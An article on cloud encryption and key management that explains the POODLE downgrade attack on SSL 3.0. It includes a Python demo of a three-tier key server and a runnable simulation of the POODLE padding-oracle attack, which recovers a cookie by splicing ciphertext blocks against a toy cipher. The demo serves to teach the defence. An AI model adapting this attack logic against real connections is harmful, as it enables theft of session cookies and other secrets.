POODLE (Padding Oracle on Downgraded Legacy Encryption): A Step towards Better Cloud Security


Cloud encryption is a service offered by cloud providers that encrypts data before it is stored in the cloud. The mechanics are the same as in-house encryption: an algorithm transforms the data into ciphertext, and the corresponding key turns the ciphertext back into plaintext. What differs is who operates it: the customer does not run the encryption machinery itself but works through the provider's policies and procedures, and it has to settle encryption key management before any data is encrypted. How much encryption a provider offers usually depends on the sensitivity of the data being hosted. Encryption is also one of the more processor-intensive operations in a data pipeline, and many providers encrypt only a few column types, such as passwords and account numbers. For the same reason many enterprises have been slow to adopt encryption for cloud-stored data: the cost of encrypting and decrypting shows up as slower data processing. To keep data flowing, providers also offer lighter-weight alternatives, redaction and obfuscation, which reduce the exposure of the data without the same processing cost.

1. Data redaction: suppressing or removing sensitive values, in particular Personally Identifiable Information (PII), so that the stored record follows a pattern that no longer contains anything identifying.

2. Obfuscation (data masking): replacing readable values with altered or random-looking text that is hard to interpret. Some masking schemes are reversible through a deterministic algorithm or a lookup table, but masking is not keyed encryption and should not be relied on in its place for data that has to stay confidential.

Encryption is used chiefly to protect data in multi-tenant environments. Implemented properly, it protects an enterprise's sensitive data even when the enterprise does not control the environment the data sits in. It applies to both private and public clouds, but matters most in the public cloud, where many users with different data sensitivity levels share the same infrastructure. It is most important for enterprises that store sensitive user data in the cloud, and its implementation differs from the one used on traditional infrastructure. Cloud encryption has three major components: the data, an encryption engine, and key management. In a cloud architecture these three are distributed across different locations rather than living in one system.

Here is how these three distributed components fit into a cloud security architecture:

1. Virtual private storage. Data is encrypted before it is transferred to the cloud and decrypted only after it has been retrieved, so the provider never handles plaintext. For example, an enterprise can use a cloud backup service that encrypts the data locally with a locally held key before uploading it. Because the enterprise manages the key itself, it must make sure its key management policies are actually followed.

2. Volume encryption. For basic encryption of stored data, an enterprise can keep the data on a second, encrypted volume. The risk is that the key is typically held by the operating system or application that mounts the volume, so anyone who can reach that instance can use the key. For example, if the enterprise generates its own encryption key but the cloud provider has no way to authenticate the OS or application presenting it, an intruder who compromises the instance can read the data.

3. Three-tier encryption. With an advanced design the enterprise separates the key from the encryption engine: the encrypted data volume, the encryption engine, and the key management server are all kept apart. Because the key is held neither with the data nor with the engine, an intruder who obtains the stored data still cannot decrypt it. The external key management server releases the key only when policy criteria are met, for example after a manual approval.
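The three-tier separation above, shown as an added Python example (not code from the original article): the volume in storage carries only a wrapped data key, the engine does the cryptography but holds no keys, and the key management server releases a key only when a policy check passes. The HMAC-based stream cipher, the key identifier, the sample record, the "second-person approval" policy and the requester names are all constructed assumptions; in practice the sealing would be AES-GCM and the key server a KMS/HSM.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


def _derive(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream_xor(key, nonce, data):
    # Counter-mode stream built from HMAC-SHA256, a stand-in for AES-GCM so the example runs offline.
    out = bytearray()
    for ctr in range(0, len(data), 32):
        block = hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[ctr:ctr + 32], block))
    return bytes(out)


def seal(key, data):
    """Encrypt-then-MAC with subkeys derived from `key`; returns nonce || ciphertext || tag."""
    nonce = os.urandom(12)
    ct = _keystream_xor(_derive(key, b"enc"), nonce, data)
    tag = hmac.new(_derive(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_(key, blob):
    nonce, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(_derive(key, b"mac"), nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed")
    return _keystream_xor(_derive(key, b"enc"), nonce, ct)


class KeyManagementServer:
    """Tier 3: holds key-encryption keys (KEKs) and releases a data key only when policy is satisfied."""

    def __init__(self):
        self._keks = {}
        self.audit = []

    def create_kek(self, kek_id):
        self._keks[kek_id] = os.urandom(32)

    def generate_data_key(self, kek_id):
        dek = os.urandom(32)
        return dek, seal(self._keks[kek_id], dek)  # plaintext DEK for immediate use, wrapped copy for storage

    def unwrap(self, kek_id, wrapped_dek, requester, approved_by=None):
        # Hypothetical policy: a release needs manual approval from someone other than the requester.
        if approved_by is None or approved_by == requester:
            self.audit.append(("deny", requester))
            raise PermissionError("key release requires manual approval by a second person")
        self.audit.append(("allow", requester, approved_by))
        return open_(self._keks[kek_id], wrapped_dek)


@dataclass
class EncryptedVolume:
    """Tier 1: what actually sits in cloud storage. Holds no usable key, only a wrapped one."""
    kek_id: str
    wrapped_dek: bytes
    ciphertext: bytes


class EncryptionEngine:
    """Tier 2: does the cryptography but stores no keys; every decrypt goes through the key server."""

    def __init__(self, kms):
        self.kms = kms

    def encrypt_volume(self, kek_id, plaintext):
        dek, wrapped = self.kms.generate_data_key(kek_id)
        return EncryptedVolume(kek_id, wrapped, seal(dek, plaintext))

    def decrypt_volume(self, vol, requester, approved_by=None):
        dek = self.kms.unwrap(vol.kek_id, vol.wrapped_dek, requester, approved_by)
        return open_(dek, vol.ciphertext)


def demo():
    kms = KeyManagementServer()
    kms.create_kek("prod-kek")  # constructed identifier
    engine = EncryptionEngine(kms)
    vol = engine.encrypt_volume("prod-kek", b"customer PII record")  # constructed sample data
    # An intruder who copies the volume (and even the engine) holds ciphertext plus a wrapped key.
    try:
        engine.decrypt_volume(vol, requester="intruder")
        intruder_read_data = True
    except PermissionError:
        intruder_read_data = False
    # A legitimate operator with a second-person approval gets the key released and the data back.
    plaintext = engine.decrypt_volume(vol, requester="ops", approved_by="security-lead")
    return intruder_read_data, plaintext, kms.audit


if __name__ == "__main__":
    print(demo())
```

The point of the layout is that compromising any one tier is not enough: the volume yields only ciphertext and a wrapped key, the engine holds nothing between requests, and the key server's audit list records every release decision, which is what a manual-approval policy needs to be reviewable.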

These are the three ways the components can be distributed today; the encryption engine, key management, and data are the three physical entities that define each encryption scenario. For SaaS, commercial products place virtual private storage inside the enterprise network and proxy the traffic to the SaaS provider, encrypting sensitive fields before they leave. Each cloud configuration needs its own encryption method to protect its data, but a structure designed to protect data even in a multi-tenant environment gives the enterprise control over it.

Implementation of Encryption for Data Protection

Before an enterprise adopts a third-party encryption engine and key management solution, it must understand which protocols are used to transmit the data. The Secure Sockets Layer (SSL) protocol, the standard for many years, came under scrutiny after the discovery of POODLE (Padding Oracle On Downgraded Legacy Encryption). POODLE is a man-in-the-middle attack: an attacker on the network path forces a client and server that both support TLS to fall back to SSL 3.0, then uses the weak CBC padding check in SSL 3.0 as a padding oracle to recover plaintext, typically secrets such as session cookies, one byte at a time at roughly 256 requests per byte. Using current TLS instead of SSL eliminates the vulnerability, but only if the server refuses SSL 3.0 outright; merely preferring TLS does not help, because the attacker induces the downgrade, which is why TLS_FALLBACK_SCSV (RFC 7507) exists to let a client flag a downgraded retry so the server can reject it. Some legacy clients, such as older browsers on Windows XP (whose TLS support stops at TLS 1.0), cannot negotiate modern TLS. This leads some cloud providers to keep SSL 3.0 enabled despite the risk of data compromise, since eliminating SSL entirely means a lot of legacy hardware and software can no longer talk to the system.
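The padding-oracle step of POODLE, as an added Python simulation (not code from the original article). It reproduces the SSL 3.0 CBC record layout (MAC, then padding whose content is never checked, then encryption), an attacker who splices a chosen ciphertext block over the padding block of each request the victim's browser sends, and the two server-side checks: the SSL 3.0 one that accepts whenever the decrypted last byte happens to be the padding length (1 in 256), and the TLS one that checks every padding byte. A four-round Feistel network stands in for the real block cipher, the session keys and the cookie value are constructed, and a fresh random IV per record is a simplification; none of that changes the mechanics, which depend only on CBC chaining and the padding check.

```python
import hashlib
import hmac
import os

BLOCK = 16
# Constructed session keys; in a real connection they come from the handshake.
ENC_KEY = b"constructed-enc-key-for-poodle-sim"
MAC_KEY = b"constructed-mac-key-for-poodle-sim"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def toy_encrypt_block(key, block):
    # 4-round Feistel network standing in for the real block cipher.
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r

def toy_decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = toy_encrypt_block(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(toy_decrypt_block(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def _mac(data):
    return hmac.new(MAC_KEY, data, hashlib.sha256).digest()[:BLOCK]

def client_encrypt_record(data, ssl3_padding=True):
    """Victim side: MAC-then-pad-then-encrypt. SSL 3.0 padding bytes are arbitrary; TLS ones equal the length byte."""
    body = data + _mac(data)
    pad_len = (BLOCK - 1) - len(body) % BLOCK
    body += (os.urandom(pad_len) if ssl3_padding else bytes([pad_len]) * pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)  # simplification: fresh random IV per record
    return iv, cbc_encrypt(ENC_KEY, iv, body)

def _strip_and_verify(pt, pad_len):
    body = pt[:-(pad_len + 1)]
    return hmac.compare_digest(body[-BLOCK:], _mac(body[:-BLOCK]))

def server_accepts_ssl3(iv, ct):
    """SSL 3.0 check: only the length byte is inspected; the padding content is ignored."""
    pt = cbc_decrypt(ENC_KEY, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK or len(pt) < pad_len + 1 + BLOCK:
        return False
    return _strip_and_verify(pt, pad_len)

def server_accepts_tls(iv, ct):
    """TLS 1.0+ check: every padding byte must equal the length byte, so a spliced block is rejected."""
    pt = cbc_decrypt(ENC_KEY, iv, ct)
    pad_len = pt[-1]
    if len(pt) < pad_len + 1 + BLOCK or any(b != pad_len for b in pt[-(pad_len + 1):-1]):
        return False
    return _strip_and_verify(pt, pad_len)

def poodle_recover(secret, oracle, max_tries_per_byte=20000):
    """Attacker side: make the victim send requests laid out so secret[k] is the last byte of a plaintext
    block and the padding is a full block, then overwrite the padding block in transit with that block.
    Acceptance (1 in 256) leaks one byte. Returns (recovered bytes, requests sent, success)."""
    recovered, tries = bytearray(), 0
    for k in range(len(secret)):
        target = k // BLOCK + 1  # plaintext block index that ends with secret[k]
        prefix_len = BLOCK * target + (BLOCK - 1) - k
        suffix_len = (-(prefix_len + len(secret) + BLOCK)) % BLOCK  # data + MAC fills whole blocks
        for _ in range(max_tries_per_byte):
            tries += 1
            iv, ct = client_encrypt_record(b"A" * prefix_len + secret + b"B" * suffix_len)
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]  # blocks[j + 1] is C_j
            if oracle(iv, ct[:-BLOCK] + blocks[target + 1]):
                # Accepted => (D(C_target) ^ C_{n-2})[15] == 15, and P_target[15] = D(C_target)[15] ^ C_{target-1}[15]
                recovered.append((BLOCK - 1) ^ blocks[-2][15] ^ blocks[target][15])
                break
        else:
            return bytes(recovered), tries, False
    return bytes(recovered), tries, True

if __name__ == "__main__":
    print("SSL 3.0 padding check:", poodle_recover(b"SESSION=7f3a", server_accepts_ssl3))
    print("TLS padding check:    ", poodle_recover(b"SESSION=7f3a", server_accepts_tls, max_tries_per_byte=2000))
```

Run against the SSL 3.0 check, the script recovers the whole cookie in a few hundred requests per byte; against the TLS check it never gets a single acceptance, which is why the fix is to refuse SSL 3.0 rather than to change the cipher. The attacker's only levers are the ones a real POODLE attacker has: control of the request's prefix and suffix lengths (via the URL and body the victim's browser is made to send) and the ability to modify ciphertext on the wire.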

Many enterprises believe the cloud provider protects sensitive data better than the company's own resources could. But cloud providers are not subject to the same laws and regulations for handling a data breach, and the enterprise that owns the data remains responsible for it and faces the fallout when it is exposed. A combination of encryption and policy can remove many cloud security challenges and make room for new innovation.

